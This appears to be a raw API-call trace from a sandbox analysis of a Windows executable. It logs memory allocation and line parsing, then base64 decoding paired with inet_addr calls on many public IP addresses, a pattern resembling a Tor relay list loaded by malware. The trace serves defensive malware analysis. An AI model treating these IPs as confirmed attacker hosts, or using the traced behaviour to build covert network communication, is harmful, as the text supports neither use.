0x36a6d66 [0118.428] malloc (_Size=0x2e) returned 0x60e7e8 [0118.429] free (_Block=0x0) [0118.429] free (_Block=0x0) [0118.429] memchr (_Buf=0x36a6d67, _Val=10, _MaxCount=0x2769ae) returned 0x36a6d75 [0118.429] malloc (_Size=0xf) returned 0x60de70 [0118.429] free (_Block=0x0) [0118.431] free (_Block=0x0) [0118.432] memchr (_Buf=0x36a6d76, _Val=10, _MaxCount=0x27699f) returned 0x36a6de6 [0118.432] malloc (_Size=0x71) returned 0x60e820 [0118.432] free (_Block=0x0) [0118.432] free (_Block=0x0) [0118.432] memchr (_Buf=0x36a6de7, _Val=10, _MaxCount=0x27692e) returned 0x36a6df8 [0118.432] malloc (_Size=0x12) returned 0x33a09d8 [0118.434] free (_Block=0x0) [0118.434] free (_Block=0x0) [0118.434] memchr (_Buf=0x36a6df9, _Val=10, _MaxCount=0x27691c) returned 0x36a6e09 [0118.434] malloc (_Size=0x11) returned 0x33a09b8 [0118.434] free (_Block=0x0) [0118.434] free (_Block=0x0) [0118.434] memchr (_Buf=0x36a6e0a, _Val=10, _MaxCount=0x27690b) returned 0x36a6e79 [0118.434] malloc (_Size=0x70) returned 0x34a0160 [0118.434] free (_Block=0x0) [0118.434] free (_Block=0x0) [0118.434] memchr (_Buf=0x36a6e7a, _Val=10, _MaxCount=0x27689b) returned 0x36a6ea6 [0118.434] malloc (_Size=0x2d) returned 0x60e8a0 [0118.434] free (_Block=0x0) [0118.434] free (_Block=0x0) [0118.435] memchr (_Buf=0x36a6ea7, _Val=10, _MaxCount=0x27686e) returned 0x36a6eb4 [0118.435] malloc (_Size=0xe) returned 0x60de88 [0118.435] free (_Block=0x0) [0118.435] free (_Block=0x0) [0118.435] memchr (_Buf=0x36a6eb5, _Val=10, _MaxCount=0x276860) returned 0x36a6f3a [0118.435] malloc (_Size=0x86) returned 0x60e8d8 [0118.435] free (_Block=0x0) [0118.435] free (_Block=0x0) [0118.435] memchr (_Buf=0x36a6f3b, _Val=10, _MaxCount=0x2767da) returned 0x36a6f4b [0118.435] malloc (_Size=0x11) returned 0x33a0a38 [0118.435] free (_Block=0x0) [0118.435] free (_Block=0x0) [0118.435] memchr (_Buf=0x36a6f4c, _Val=10, _MaxCount=0x2767c9) returned 0x36a70ca [0118.435] malloc (_Size=0x17f) returned 0x60e968 [0118.435] free (_Block=0x0) [0118.435] free (_Block=0x0) [0118.435] memchr (_Buf=0x36a70cb, _Val=10, _MaxCount=0x27664a) returned 0x36a7139 [0118.435] malloc (_Size=0x6f) returned 0x34a0520 [0118.435] free (_Block=0x0) [0118.435] free (_Block=0x0) [0118.435] memchr (_Buf=0x36a713a, _Val=10, _MaxCount=0x2765db) returned 0x36a7151 [0118.435] malloc (_Size=0x18) returned 0x33a0ad8 [0118.436] free (_Block=0x0) [0118.436] free (_Block=0x0) [0118.436] memchr (_Buf=0x36a7152, _Val=10, _MaxCount=0x2765c3) returned 0x36a7178 [0118.436] malloc (_Size=0x27) returned 0x60eaf0 [0118.436] free (_Block=0x0) [0118.436] free (_Block=0x0) [0118.436] memchr (_Buf=0x36a7179, _Val=10, _MaxCount=0x27659c) returned 0x36a7186 [0118.436] malloc (_Size=0xe) returned 0x60dcf0 [0118.436] free (_Block=0x0) [0118.436] free (_Block=0x0) [0118.436] memchr (_Buf=0x36a7187, _Val=10, _MaxCount=0x27658e) returned 0x36a720c [0118.436] malloc (_Size=0x86) returned 0x60eb20 [0118.436] free (_Block=0x0) [0118.436] free (_Block=0x0) [0118.436] memchr (_Buf=0x36a720d, _Val=10, _MaxCount=0x276508) returned 0x36a721d [0118.436] malloc (_Size=0x11) returned 0x33a0938 [0118.436] free (_Block=0x0) [0118.436] free (_Block=0x0) [0118.436] memchr (_Buf=0x36a721e, _Val=10, _MaxCount=0x2764f7) returned 0x36a726b [0118.436] malloc (_Size=0x4e) returned 0x60ebb0 [0118.436] free (_Block=0x0) [0118.437] free (_Block=0x0) [0118.437] memchr (_Buf=0x36a726c, _Val=10, _MaxCount=0x2764a9) returned 0x36a72de [0118.437] malloc (_Size=0x73) returned 0x60ec08 [0118.437] free (_Block=0x0) [0118.437] free (_Block=0x0) [0118.437] memchr (_Buf=0x36a72df, _Val=10, _MaxCount=0x276436) returned 0x36a72fd [0118.437] malloc (_Size=0x1f) returned 0x60ec88 [0118.437] free (_Block=0x0) [0118.437] free (_Block=0x0) [0118.437] memchr (_Buf=0x36a72fe, _Val=10, _MaxCount=0x276417) returned 0x36a732b [0118.437] malloc (_Size=0x2e) returned 0x60ecb0 [0118.437] free (_Block=0x0) [0118.437] free (_Block=0x0) [0118.437] memchr (_Buf=0x36a732c, _Val=10, _MaxCount=0x2763e9) returned 0x36a7339 [0118.437] malloc (_Size=0xe) returned 0x60dd68 [0118.437] free (_Block=0x0) [0118.437] free (_Block=0x0) [0118.437] memchr (_Buf=0x36a733a, _Val=10, _MaxCount=0x2763db) returned 0x36a73bf [0118.437] malloc (_Size=0x86) returned 0x60ece8 [0118.437] free (_Block=0x0) [0118.437] free (_Block=0x0) [0118.437] memchr (_Buf=0x36a73c0, _Val=10, _MaxCount=0x276355) returned 0x36a73d1 [0118.437] malloc (_Size=0x12) returned 0x33a08d8 [0118.438] free (_Block=0x0) [0118.438] free (_Block=0x0) [0118.438] memchr (_Buf=0x36a73d2, _Val=10, _MaxCount=0x276343) returned 0x36a73e2 [0118.438] malloc (_Size=0x11) returned 0x33a0918 [0118.438] free (_Block=0x0) [0118.438] free (_Block=0x0) [0118.438] memchr (_Buf=0x36a73e3, _Val=10, _MaxCount=0x276332) returned 0x36a7454 [0118.438] malloc (_Size=0x72) returned 0x60ed78 [0118.438] free (_Block=0x0) [0118.438] free (_Block=0x0) [0118.438] memchr (_Buf=0x36a7455, _Val=10, _MaxCount=0x2762c0) returned 0x36a747c [0118.438] malloc (_Size=0x28) returned 0x60edf8 [0118.438] free (_Block=0x0) [0118.438] free (_Block=0x0) [0118.438] memchr (_Buf=0x36a747d, _Val=10, _MaxCount=0x276298) returned 0x36a748a [0118.438] malloc (_Size=0xe) returned 0x60dea0 [0118.438] free (_Block=0x0) [0118.438] free (_Block=0x0) [0118.438] memchr (_Buf=0x36a748b, _Val=10, _MaxCount=0x27628a) returned 0x36a7510 [0118.438] malloc (_Size=0x86) returned 0x34a1208 [0118.438] free (_Block=0x0) [0118.438] free (_Block=0x0) [0118.439] memchr (_Buf=0x36a7511, _Val=10, _MaxCount=0x276204) returned 0x36a7520 [0118.439] malloc (_Size=0x10) returned 0x60dcd8 [0118.439] free (_Block=0x0) [0118.439] free (_Block=0x0) [0118.439] memchr (_Buf=0x36a7521, _Val=10, _MaxCount=0x2761f4) returned 0x36a7531 [0118.439] malloc (_Size=0x11) returned 0x33a0a78 [0118.439] free (_Block=0x0) [0118.439] free (_Block=0x0) [0118.439] memchr (_Buf=0x36a7532, _Val=10, _MaxCount=0x2761e3) returned 0x36a75a0 [0118.439] malloc (_Size=0x6f) returned 0x34a02c8 [0118.439] free (_Block=0x0) [0118.439] free (_Block=0x0) [0118.439] memchr (_Buf=0x36a75a1, _Val=10, _MaxCount=0x276174) returned 0x36a75b8 [0118.439] malloc (_Size=0x18) returned 0x33a0af8 [0118.439] free (_Block=0x0) [0118.439] free (_Block=0x0) [0118.439] memchr (_Buf=0x36a75b9, _Val=10, _MaxCount=0x27615c) returned 0x36a75eb [0118.439] malloc (_Size=0x33) returned 0x60ee28 [0118.439] free (_Block=0x0) [0118.439] free (_Block=0x0) [0118.439] memchr (_Buf=0x36a75ec, _Val=10, _MaxCount=0x276129) returned 0x36a75f9 [0118.439] malloc (_Size=0xe) returned 0x60de10 [0118.439] free (_Block=0x0) [0118.440] free (_Block=0x0) [0118.440] memchr (_Buf=0x36a75fa, _Val=10, _MaxCount=0x27611b) returned 0x36a767f [0118.440] malloc (_Size=0x86) returned 0x34a13b8 [0118.440] free (_Block=0x0) [0118.440] free (_Block=0x0) [0118.440] memchr (_Buf=0x36a7680, _Val=10, _MaxCount=0x276095) returned 0x36a7691 [0118.440] malloc (_Size=0x12) returned 0x33a0b18 [0118.440] free (_Block=0x0) [0118.440] free (_Block=0x0) [0118.440] memchr (_Buf=0x36a7692, _Val=10, _MaxCount=0x276083) returned 0x36a76df [0118.440] malloc (_Size=0x4e) returned 0x60ee68 [0118.440] free (_Block=0x0) [0118.440] free (_Block=0x0) [0118.440] memchr (_Buf=0x36a76e0, _Val=10, _MaxCount=0x276035) returned 0x36a774f [0118.440] malloc (_Size=0x70) returned 0x34a0700 [0118.440] free (_Block=0x0) [0118.440] free (_Block=0x0) [0118.440] memchr (_Buf=0x36a7750, _Val=10, _MaxCount=0x275fc5) returned 0x36a777e [0118.440] malloc (_Size=0x2f) returned 0x60eec0 [0118.440] free (_Block=0x0) [0118.440] free (_Block=0x0) [0118.440] memchr (_Buf=0x36a777f, _Val=10, _MaxCount=0x275f96) returned 0x36a77ac [0118.440] malloc (_Size=0x2e) returned 0x60eef8 [0118.441] free (_Block=0x0) [0118.441] free (_Block=0x0) [0118.441] memchr (_Buf=0x36a77ad, _Val=10, _MaxCount=0x275f68) returned 0x36a77ba [0118.441] malloc (_Size=0xe) returned 0x60dd80 [0118.441] free (_Block=0x0) [0118.441] free (_Block=0x0) [0118.441] memchr (_Buf=0x36a77bb, _Val=10, _MaxCount=0x275f5a) returned 0x36a7840 [0118.441] malloc (_Size=0x86) returned 0x34a17a8 [0118.441] free (_Block=0x0) [0118.441] free (_Block=0x0) [0118.441] memchr (_Buf=0x36a7841, _Val=10, _MaxCount=0x275ed4) returned 0x36a7852 [0118.441] malloc (_Size=0x12) returned 0x33a0758 [0118.441] free (_Block=0x0) [0118.441] free (_Block=0x0) [0118.441] memchr (_Buf=0x36a7853, _Val=10, _MaxCount=0x275ec2) returned 0x36a7863 [0118.441] malloc (_Size=0x11) returned 0x34a1a08 [0118.441] free (_Block=0x0) [0118.441] free (_Block=0x0) [0118.441] memchr (_Buf=0x36a7864, _Val=10, _MaxCount=0x275eb1) returned 0x36a78dd [0118.441] malloc (_Size=0x7a) returned 0x60a248 [0118.441] free (_Block=0x0) [0118.441] free (_Block=0x0) [0118.441] memchr (_Buf=0x36a78de, _Val=10, _MaxCount=0x275e37) returned 0x36a790b [0118.442] malloc (_Size=0x2e) returned 0x60ef30 [0118.442] free (_Block=0x0) [0118.442] free (_Block=0x0) [0118.442] memchr (_Buf=0x36a790c, _Val=10, _MaxCount=0x275e09) returned 0x36a7919 [0118.442] malloc (_Size=0xe) returned 0x60dd98 [0118.442] free (_Block=0x0) [0118.442] free (_Block=0x0) [0118.442] memchr (_Buf=0x36a791a, _Val=10, _MaxCount=0x275dfb) returned 0x36a799f [0118.442] malloc (_Size=0x86) returned 0x34a0b48 [0118.442] free (_Block=0x0) [0118.442] free (_Block=0x0) [0118.442] memchr (_Buf=0x36a79a0, _Val=10, _MaxCount=0x275d75) returned 0x36a79b0 [0118.442] malloc (_Size=0x11) returned 0x34a1ae8 [0118.442] free (_Block=0x0) [0118.442] free (_Block=0x0) [0118.442] memchr (_Buf=0x36a79b1, _Val=10, _MaxCount=0x275d64) returned 0x36a79c1 [0118.442] malloc (_Size=0x11) returned 0x34a1b28 [0118.442] free (_Block=0x0) [0118.442] free (_Block=0x0) [0118.442] memchr (_Buf=0x36a79c2, _Val=10, _MaxCount=0x275d53) returned 0x36a7a2d [0118.442] malloc (_Size=0x6c) returned 0x34a0778 [0118.442] free (_Block=0x0) [0118.443] free (_Block=0x0) [0118.443] memchr (_Buf=0x36a7a2e, _Val=10, _MaxCount=0x275ce7) returned 0x36a7a5a [0118.443] malloc (_Size=0x2d) returned 0x34a2360 [0118.443] free (_Block=0x0) [0118.443] free (_Block=0x0) [0118.443] memchr (_Buf=0x36a7a5b, _Val=10, _MaxCount=0x275cba) returned 0x36a7a82 [0118.443] malloc (_Size=0x28) returned 0x60ef68 [0118.443] free (_Block=0x0) [0118.443] free (_Block=0x0) [0118.443] memchr (_Buf=0x36a7a83, _Val=10, _MaxCount=0x275c92) returned 0x36a7a90 [0118.443] malloc (_Size=0xe) returned 0x60ddb0 [0118.443] free (_Block=0x0) [0118.443] free (_Block=0x0) [0118.443] memchr (_Buf=0x36a7a91, _Val=10, _MaxCount=0x275c84) returned 0x36a7b16 [0118.443] malloc (_Size=0x86) returned 0x34a1448 [0118.443] free (_Block=0x0) [0118.443] free (_Block=0x0) [0118.443] memchr (_Buf=0x36a7b17, _Val=10, _MaxCount=0x275bfe) returned 0x36a7b27 [0118.443] malloc (_Size=0x11) returned 0x34a1ba8 [0118.443] free (_Block=0x0) [0118.443] free (_Block=0x0) [0118.443] memchr (_Buf=0x36a7b28, _Val=10, _MaxCount=0x275bed) returned 0x36a7b38 [0118.443] malloc (_Size=0x11) returned 0x34a1888 [0118.444] free (_Block=0x0) [0118.444] free (_Block=0x0) [0118.444] memchr (_Buf=0x36a7b39, _Val=10, _MaxCount=0x275bdc) returned 0x36a7bad [0118.444] malloc (_Size=0x75) returned 0x34a2468 [0118.444] free (_Block=0x0) [0118.444] free (_Block=0x0) [0118.444] memchr (_Buf=0x36a7bae, _Val=10, _MaxCount=0x275b67) returned 0x36a7be0 [0118.444] malloc (_Size=0x33) returned 0x60ef98 [0118.444] free (_Block=0x0) [0118.444] free (_Block=0x0) [0118.444] memchr (_Buf=0x36a7be1, _Val=10, _MaxCount=0x275b34) returned 0x36a7bee [0118.444] malloc (_Size=0xe) returned 0x60dde0 [0118.444] free (_Block=0x0) [0118.444] free (_Block=0x0) [0118.444] memchr (_Buf=0x36a7bef, _Val=10, _MaxCount=0x275b26) returned 0x36a7c74 [0118.444] malloc (_Size=0x86) returned 0x34a0ab8 [0118.444] free (_Block=0x0) [0118.444] free (_Block=0x0) [0118.444] memchr (_Buf=0x36a7c75, _Val=10, _MaxCount=0x275aa0) returned 0x36a7c86 [0118.444] malloc (_Size=0x12) returned 0x34a18a8 [0118.444] free (_Block=0x0) [0118.444] free (_Block=0x0) [0118.445] memchr (_Buf=0x36a7c87, _Val=10, _MaxCount=0x275a8e) returned 0x36a7cd4 [0118.445] malloc (_Size=0x4e) returned 0x34a24e8 [0118.445] free (_Block=0x0) [0118.445] free (_Block=0x0) [0118.445] memchr (_Buf=0x36a7cd5, _Val=10, _MaxCount=0x275a40) returned 0x36a7d46 [0118.445] malloc (_Size=0x72) returned 0x34a30e8 [0118.445] free (_Block=0x0) [0118.445] free (_Block=0x0) [0118.445] memchr (_Buf=0x36a7d47, _Val=10, _MaxCount=0x2759ce) returned 0x36a7d79 [0118.445] malloc (_Size=0x33) returned 0x34a3548 [0118.445] free (_Block=0x0) [0118.445] free (_Block=0x0) [0118.445] memchr (_Buf=0x36a7d7a, _Val=10, _MaxCount=0x27599b) returned 0x36a7d87 [0118.445] malloc (_Size=0xe) returned 0x34a3678 [0118.445] free (_Block=0x0) [0118.445] free (_Block=0x0) [0118.445] memchr (_Buf=0x36a7d88, _Val=10, _MaxCount=0x27598d) returned 0x36a7e0d [0118.445] malloc (_Size=0x86) returned 0x34a1718 [0118.445] free (_Block=0x0) [0118.445] free (_Block=0x0) [0118.445] memchr (_Buf=0x36a7e0e, _Val=10, _MaxCount=0x275907) returned 0x36a7e1f [0118.445] malloc (_Size=0x12) returned 0x34a19c8 [0118.446] free (_Block=0x0) [0118.446] free (_Block=0x0) [0118.495] memchr (_Buf=0x36a7e20, _Val=10, _MaxCount=0x2758f5) returned 0x36a7fa0 [0118.495] malloc (_Size=0x181) returned 0x34a3990 [0118.495] free (_Block=0x0) [0118.495] free (_Block=0x0) [0118.495] memchr (_Buf=0x36a7fa1, _Val=10, _MaxCount=0x275774) returned 0x36a800c [0118.495] malloc (_Size=0x6c) returned 0x34a04a8 [0118.495] free (_Block=0x0) [0118.495] free (_Block=0x0) [0118.495] memchr (_Buf=0x36a800d, _Val=10, _MaxCount=0x275708) returned 0x36a803a [0118.495] malloc (_Size=0x2e) returned 0x34a22b8 [0118.495] free (_Block=0x0) [0118.495] free (_Block=0x0) [0118.495] memchr (_Buf=0x36a803b, _Val=10, _MaxCount=0x2756da) returned 0x36a8048 [0118.495] malloc (_Size=0xe) returned 0x34a36a8 [0118.495] free (_Block=0x0) [0118.496] free (_Block=0x0) [0118.496] memchr (_Buf=0x36a8049, _Val=10, _MaxCount=0x2756cc) returned 0x36a80b9 [0118.496] malloc (_Size=0x71) returned 0x34a2d68 [0118.496] free (_Block=0x0) [0118.496] free (_Block=0x0) [0118.496] memchr (_Buf=0x36a80ba, _Val=10, _MaxCount=0x27565b) returned 0x36a80ca [0118.496] malloc (_Size=0x11) returned 0x34a1928 [0118.496] free (_Block=0x0) [0118.496] free (_Block=0x0) [0118.496] memchr (_Buf=0x36a80cb, _Val=10, _MaxCount=0x27564a) returned 0x36a80db [0118.496] malloc (_Size=0x11) returned 0x34a1b48 [0118.496] free (_Block=0x0) [0118.496] free (_Block=0x0) [0118.496] memchr (_Buf=0x36a80dc, _Val=10, _MaxCount=0x275639) returned 0x36a8147 [0118.496] malloc (_Size=0x6c) returned 0x34a0070 [0118.496] free (_Block=0x0) [0118.496] free (_Block=0x0) [0118.496] memchr (_Buf=0x36a8148, _Val=10, _MaxCount=0x2755cd) returned 0x36a8174 [0118.496] malloc (_Size=0x2d) returned 0x34a20c0 [0118.496] free (_Block=0x0) [0118.496] free (_Block=0x0) [0118.496] memchr (_Buf=0x36a8175, _Val=10, _MaxCount=0x2755a0) returned 0x36a8183 [0118.496] malloc (_Size=0xf) returned 0x34a36c0 [0118.497] free (_Block=0x0) [0118.497] free (_Block=0x0) [0118.497] memchr (_Buf=0x36a8184, _Val=10, _MaxCount=0x275591) returned 0x36a81f4 [0118.497] malloc (_Size=0x71) returned 0x34a2b68 [0118.497] free (_Block=0x0) [0118.497] free (_Block=0x0) [0118.497] memchr (_Buf=0x36a81f5, _Val=10, _MaxCount=0x275520) returned 0x36a8204 [0118.497] malloc (_Size=0x10) returned 0x34a36d8 [0118.497] free (_Block=0x0) [0118.497] free (_Block=0x0) [0118.497] memchr (_Buf=0x36a8205, _Val=10, _MaxCount=0x275510) returned 0x36a837d [0118.497] malloc (_Size=0x179) returned 0x34a3b20 [0118.497] free (_Block=0x0) [0118.497] free (_Block=0x0) [0118.497] memchr (_Buf=0x36a837e, _Val=10, _MaxCount=0x275397) returned 0x36a83ed [0118.786] _mkgmtime (param_1=0x339fb14) returned 0x5f998770 [0118.786] free (_Block=0x3d70b98) [0118.786] free (_Block=0x3648728) [0118.786] free (_Block=0x349efd8) [0118.786] free (_Block=0x3648710) [0118.787] free (_Block=0x3648770) [0118.787] free (_Block=0x3648788) [0118.787] free (_Block=0x3d81530) [0118.787] memchr (_Buf=0x606700, _Val=32, _MaxCount=0x14) returned 0x60670c [0119.291] CryptStringToBinaryA (in: pszString="AAbeLnfjw+xeGCWwduUlf9IA7Qo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.291] CryptStringToBinaryA (in: pszString="AAbeLnfjw+xeGCWwduUlf9IA7Qo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.291] malloc (_Size=0x74) returned 0x3d668b0 [0119.291] inet_addr (cp="80.195.122.166") returned 0xa67ac350 [0119.292] CryptStringToBinaryA (in: pszString="AAoQ1DAR6kkoo19hBAX5K0QztNw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] CryptStringToBinaryA (in: pszString="AAoQ1DAR6kkoo19hBAX5K0QztNw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] malloc (_Size=0x74) returned 0x3d66330 [0119.292] inet_addr (cp="98.234.189.216") returned 0xd8bdea62 [0119.292] CryptStringToBinaryA (in: pszString="ABG9JIWtRdmE7EFZyI/AZuXjMA4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] CryptStringToBinaryA (in: pszString="ABG9JIWtRdmE7EFZyI/AZuXjMA4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] malloc (_Size=0x74) returned 0x3d663b0 [0119.292] inet_addr (cp="162.247.74.201") returned 0xc94af7a2 [0119.292] CryptStringToBinaryA (in: pszString="ABLiyQZzB7zWByF5wzs1Zl7MiCg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] CryptStringToBinaryA (in: pszString="ABLiyQZzB7zWByF5wzs1Zl7MiCg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b78, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b78, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] malloc (_Size=0x74) returned 0x3d669b0 [0119.292] inet_addr (cp="110.32.66.193") returned 0xc142206e [0119.292] CryptStringToBinaryA (in: pszString="ACDYogSoH8jIodeeIyRiFwXeTy8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] CryptStringToBinaryA (in: pszString="ACDYogSoH8jIodeeIyRiFwXeTy8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d709d8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.292] malloc (_Size=0x74) returned 0x3d66430 [0119.293] inet_addr (cp="178.17.170.116") returned 0x74aa11b2 [0119.293] CryptStringToBinaryA (in: pszString="ACQOyytTWqTB4YdNdE36avLl6UE", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.293] CryptStringToBinaryA (in: pszString="ACQOyytTWqTB4YdNdE36avLl6UE", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.293] malloc (_Size=0x74) returned 0x3d66ab0 [0119.293] inet_addr (cp="95.111.230.178") returned 0xb2e66f5f [0119.293] CryptStringToBinaryA (in: pszString="ADQsDhVdRULlU5F4iy13nxRXjes", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.293] CryptStringToBinaryA (in: pszString="ADQsDhVdRULlU5F4iy13nxRXjes", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.293] malloc (_Size=0x74) returned 0x3d664b0 [0119.293] inet_addr (cp="188.24.10.72") returned 0x480a18bc [0119.293] CryptStringToBinaryA (in: pszString="ADv6G2zFy+/V0Agvj8mvKohoqPs", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.293] CryptStringToBinaryA (in: pszString="ADv6G2zFy+/V0Agvj8mvKohoqPs", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.293] malloc (_Size=0x74) returned 0x3d66530 [0119.293] inet_addr (cp="188.214.132.49") returned 0x3184d6bc [0119.294] CryptStringToBinaryA (in: pszString="AD14gl4Llgnuz/Xk4FKXF3cuU8c", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] CryptStringToBinaryA (in: pszString="AD14gl4Llgnuz/Xk4FKXF3cuU8c", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] malloc (_Size=0x74) returned 0x3d665b0 [0119.294] inet_addr (cp="104.218.63.73") returned 0x493fda68 [0119.294] CryptStringToBinaryA (in: pszString="AFB5pCNWGDzqWjrdI5MD9E8S5+o", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] CryptStringToBinaryA (in: pszString="AFB5pCNWGDzqWjrdI5MD9E8S5+o", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] malloc (_Size=0x74) returned 0x3d66b30 [0119.294] inet_addr (cp="62.210.177.189") returned 0xbdb1d23e [0119.294] CryptStringToBinaryA (in: pszString="AFWFaj8/1yvy3+6Yg+yLeuYoLEM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] CryptStringToBinaryA (in: pszString="AFWFaj8/1yvy3+6Yg+yLeuYoLEM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] malloc (_Size=0x74) returned 0x3d66bb0 [0119.294] inet_addr (cp="195.123.247.40") returned 0x28f77bc3 [0119.294] CryptStringToBinaryA (in: pszString="AF7ZchP3JYZ+QiuNwEQzYbuyTjw", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] CryptStringToBinaryA (in: pszString="AF7ZchP3JYZ+QiuNwEQzYbuyTjw", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.294] malloc (_Size=0x74) returned 0x3d66c30 [0119.295] inet_addr (cp="104.244.79.75") returned 0x4b4ff468 [0119.295] CryptStringToBinaryA (in: pszString="AHe8unJE2z5qXtJ0boYXAGZoSIc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] CryptStringToBinaryA (in: pszString="AHe8unJE2z5qXtJ0boYXAGZoSIc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] malloc (_Size=0x74) returned 0x3d66cb0 [0119.295] inet_addr (cp="199.249.230.103") returned 0x67e6f9c7 [0119.295] CryptStringToBinaryA (in: pszString="AHhhedsOZRQUL0TbQWZjhxLzTa4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.295] 